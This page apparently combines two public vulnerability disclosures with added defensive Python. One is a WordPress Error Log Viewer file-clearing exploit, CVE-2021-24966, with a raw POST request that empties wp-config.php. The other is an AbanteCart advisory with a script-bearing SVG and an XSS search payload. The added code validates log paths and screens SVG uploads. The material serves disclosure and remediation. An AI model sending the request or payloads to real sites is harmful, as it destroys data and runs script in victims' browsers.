<pre><code># Exploit Title: WordPress Plugin Error Log Viewer 1.1.1 - Arbitrary File Clearing (Authenticated)<br /># Date: 09-11-2021<br /># Exploit Author: Ceylan Bozogullarindan<br /># Exploit Website: https://bozogullarindan.com<br /># Vendor Homepage: https://bestwebsoft.com/<br /># Software Link: https://bestwebsoft.com/products/wordpress/plugins/error-log-viewer/<br /># Version: 1.1.1<br /># Tested on: Linux<br /># CVE: CVE-2021-24966 (https://wpscan.com/vulnerability/166a4f88-4f0c-4bf4-b624-5e6a02e21fa0)<br /><br /><br /># Description:<br /><br />Error Log Viewer is a simple utility plugin that helps to find and view log files with errors right from the WordPress admin dashboard. Get access to all log files from one place. View the latest activity, select logs by date, view a full log file or clear a log file!<br /><br />I have emphasized "clearing a log file" because that feature can be used to delete an arbitrary file on a WordPress site. The vulnerability exists because the path of the file to be cleared is not properly validated. The parameter leading to the vulnerability is "rrrlgvwr_clear_file_name"; it can only be manipulated by authenticated users.<br /><br />An attacker can use this vulnerability to destroy the site by deleting the wp-config.php file, or to cover their tracks by clearing related log files.<br /><br /># Steps To Reproduce<br /><br />1. Install and activate the plugin.<br />2. Click "Log Monitor" under the Error Log Viewer menu item.<br />3. Choose a log file to clear.<br />4. Intercept the request via Burp or any other local proxy tool.<br />5. Replace the value of the parameter "rrrlgvwr_clear_file_name" with the path of the file to be cleared, such as /var/www/html/wp-config.php.<br />6. Check the content of the cleared file. 
You will see that the file is empty.<br /><br /><br /># PoC - Supported Materials<br /><br />---------------------------------------------------------------------------<br />POST /wp-admin/admin.php?page=rrrlgvwr-monitor.php HTTP/1.1<br />Host: 127.0.0.1:8000<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 603<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />Cookie: [admin+]<br /><br />rrrlgvwr_select_log=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Flearnpress%2Finc%2Fgateways%2Fpaypal%2Fpaypal-ipn%2Fipn_errors.log&rrrlgvwr_lines_count=10&rrrlgvwr_from=&rrrlgvwr_to=&rrrlgvwr_show_content=all&rrrlgvwr_newcontent=%5B05-Feb-2015+07%3A28%3A49+UTC%5D+Invalid+HTTP+request+method.%0D%0A%0D%0A++++++++++++++++++++++++&rrrlgvwr_clear_file=Clear+log+file&rrrlgvwr_clear_file_name=/var/www/html/wp-config.php&rrrlgvwr_nonce_name=1283d54cc5&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Drrrlgvwr-monitor.php<br />---------------------------------------------------------------------------<br /><br /></code></pre>
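<p>The request above works because the plugin truncates whatever path rrrlgvwr_clear_file_name names. The Python block below is an added example, not code from the advisory, the plugin or WordPress; it shows the check such a "clear log" action needs: canonicalise the requested name, prove it resolves inside the directory that holds the logs, and only then open it for truncation. The directory layout in demo() is constructed in a temporary folder (a log file inside the allowed root and a wp-config.php beside it, mirroring the advisory's target).</p>

```python
import os
import tempfile


def resolve_log_path(requested, log_root):
    """Map a user-supplied name to a file that is provably inside log_root.

    realpath() follows symlinks and collapses "..", and os.path.join() returns an absolute
    `requested` unchanged, so "/var/www/html/wp-config.php" and "../wp-config.php" both
    resolve outside log_root and are rejected before anything touches the filesystem.
    """
    root = os.path.realpath(log_root)
    target = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError(f"{requested!r} resolves outside the log directory")
    if not target.lower().endswith(".log"):
        raise PermissionError(f"{requested!r} is not a log file")
    return target


def clear_log(requested, log_root):
    """Truncate the named log; returns True on success, False when the path is rejected."""
    try:
        path = resolve_log_path(requested, log_root)
    except PermissionError:
        return False
    with open(path, "w"):
        pass
    return True


def demo():
    """Constructed layout: logs/ipn_errors.log inside the allowed root, wp-config.php beside it."""
    base = tempfile.mkdtemp()
    log_root = os.path.join(base, "logs")
    os.makedirs(log_root)
    log_file = os.path.join(log_root, "ipn_errors.log")
    with open(log_file, "w") as fh:
        fh.write("[05-Feb-2015 07:28:49 UTC] Invalid HTTP request method.\n")
    config = os.path.join(base, "wp-config.php")
    with open(config, "w") as fh:
        fh.write("<?php define('DB_NAME', 'wordpress');\n")
    return {
        "log_cleared": clear_log("ipn_errors.log", log_root),
        "log_size_after": os.path.getsize(log_file),
        "absolute_config_path_rejected": not clear_log(config, log_root),
        "traversal_rejected": not clear_log("../wp-config.php", log_root),
        "config_still_intact": os.path.getsize(config) > 0,
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

<p>commonpath() rather than a startswith() prefix test is deliberate: a prefix test would accept a sibling directory whose name merely begins with the root's name. In the plugin the same rule would apply to the value of rrrlgvwr_clear_file_name, with the nonce check kept as it is, since a nonce protects against CSRF, not against an authenticated user supplying an arbitrary path.</p>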
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20211213-0 ><br />=======================================================================<br /> title: Multiple vulnerabilities<br /> product: AbanteCart e-commerce platform<br /> vulnerable version: <1.3.2<br /> fixed version: 1.3.2<br /> CVE number: CVE-2021-42050, CVE-2021-42051<br /> impact: Medium<br /> homepage: https://www.abantecart.com<br /> found: 2021-07-19<br /> by: Daniel Teo (Office SG)<br /> Ian Chong (Office SG)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"The meaning of the word 'abante' is to move forward or lead.<br />AbanteCart community stand behind exceptional work quality and dedication to<br />creating outstanding eCommerce software services. 
Our inspiration comes from<br />the developers that like developing with AbanteCart and constantly work to<br />expand and keep this project alive."<br /><br />Source: https://www.abantecart.com<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends all companies who are using the AbanteCart software to<br />upgrade to the latest version which is available at the vendor's official<br />website.<br /><br />An in-depth security analysis performed by security professionals is highly<br />advised, as the software may be affected by further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Unrestricted File Upload (CVE-2021-42051)<br />Any low privileged user with file upload permissions can upload malicious SVG<br />files that contain a JavaScript payload.<br /><br />By proceeding to the SVG file location, the payload will be executed on the<br />client-side.<br /><br /><br />2) DOM Based Cross-Site Scripting (CVE-2021-42050)<br />DOM Based XSS is an XSS attack wherein the attack payload is executed as a<br />result of modifying the DOM "environment" in the victim's browser used by the<br />original client-side script, so that the client-side code runs in an<br />"unexpected" manner.<br /><br />The application was found to have a cross-site scripting vulnerability where<br />user supplied input is directly reflected in the Document Object Model, leading to<br />execution of arbitrary code. 
The vulnerable location is an input form which<br />allows users to perform search actions.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Unrestricted File Upload (CVE-2021-42051)<br /><br />A PoC SVG file can be created as follows:<br /><br />* ************************************************************************** *<br /><?xml version="1.0" standalone="no"?><br /><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"<br />"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><br /><br /><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><br /> <rect width="300" height="100" style="fill:rgb(0,0,255);<br />stroke-width:3;stroke:rgb(0,0,0)" /><br /> <script type="text/javascript"><br /> alert("sectest XSS");<br /> </script><br /></svg><br />* ************************************************************************** *<br /><br />2) DOM Based Cross-Site Scripting (CVE-2021-42050)<br /><br />A payload was used in the search engine:<br /><br />* ************************************************************************** *<br /><script>alert(document.domain)</script><br />* ************************************************************************** *<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following product version has been tested which was the latest version available<br />during the time of the test:<br />* v1.3.0<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-08-16: Contacting vendor through help@abantecart.com<br />2021-08-27: Vendor responded and indicated that the AbanteCart team have<br /> scheduled a release on 25 September 2021 to address the issues.<br />2021-12-07: Multiple emails to check with the vendor on the release date.<br /> However, no response from the AbanteCart team but noticed that<br /> they had released the new version on 26 Nov 2021.<br />2021-12-13: Release of security advisory<br /><br /><br />Solution:<br />---------<br />Upgrade 
to the latest version available v1.3.2 at the vendor's download page:<br />https://www.abantecart.com/download<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Teo, Ian Chong / @2021<br /><br /><br /></code></pre>
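<p>The SVG in the proof of concept for CVE-2021-42051 is a valid image that also carries a script element, which is why an upload filter that only checks the extension or the MIME type lets it through. The Python block below is an added example, not code from the advisory or from AbanteCart; it parses an uploaded SVG, rejects it when it carries script-bearing elements, event-handler attributes or javascript: links, and returns the response headers under which an accepted upload should be served so that even a missed payload cannot run on the shop's origin. POC_SVG reproduces the advisory's file; CLEAN_SVG is constructed for contrast.</p>

```python
import xml.etree.ElementTree as ET

# The advisory's PoC file, reproduced here as the malicious input.
POC_SVG = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <rect width="300" height="100" style="fill:rgb(0,0,255);
stroke-width:3;stroke:rgb(0,0,0)" />
  <script type="text/javascript">
    alert("sectest XSS");
  </script>
</svg>'''

# Constructed benign upload for contrast.
CLEAN_SVG = b'''<svg xmlns="http://www.w3.org/2000/svg" width="300" height="100">
  <rect width="300" height="100" style="fill:rgb(0,0,255)" />
</svg>'''

SCRIPT_BEARING_TAGS = {"script", "foreignobject"}
HREF_ATTRS = {"href", "{http://www.w3.org/1999/xlink}href"}


def local_name(qualified):
    """Strip the XML namespace so '{http://www.w3.org/2000/svg}script' compares as 'script'."""
    return qualified.rsplit("}", 1)[-1].lower()


def svg_problems(data):
    """List the reasons an uploaded SVG must not be hosted on the site's own origin; [] means none found."""
    try:
        root = ET.fromstring(data)   # expat does not fetch the external DTD named in the DOCTYPE
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    if local_name(root.tag) != "svg":
        return ["root element is not svg"]
    problems = []
    for el in root.iter():
        tag = local_name(el.tag)
        if tag in SCRIPT_BEARING_TAGS:
            problems.append(f"<{tag}> element")
        for attr, value in el.attrib.items():
            if local_name(attr).startswith("on"):
                problems.append(f"<{tag}> has event handler attribute {local_name(attr)}")
            if attr in HREF_ATTRS and value.strip().lower().startswith("javascript:"):
                problems.append(f"<{tag}> has a javascript: href")
    return problems


def upload_response_headers(filename):
    """Headers for serving any accepted upload: download-only, no sniffing, and a CSP that blocks script anyway."""
    return {
        "Content-Type": "image/svg+xml",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        "X-Content-Type-Options": "nosniff",
    }


def handle_upload(filename, data):
    """Reject script-bearing SVGs outright; return the headers to store alongside an accepted one."""
    problems = svg_problems(data)
    if problems:
        return {"accepted": False, "problems": problems}
    return {"accepted": True, "headers": upload_response_headers(filename)}


if __name__ == "__main__":
    print("PoC file:", handle_upload("poc.svg", POC_SVG))
    print("clean file:", handle_upload("logo.svg", CLEAN_SVG))
```

<p>The element check and the serving headers are independent layers: the first keeps the PoC out of the media library, the second (attachment disposition plus a sandboxing CSP) means a payload that slips past the parser is never executed in the shop's origin. Serving uploads from a separate cookieless domain achieves the same isolation for the second layer. The DOM-based XSS in the search form (CVE-2021-42050) is a different defect, fixed by encoding or text-node insertion of the search term rather than by anything on the upload path.</p>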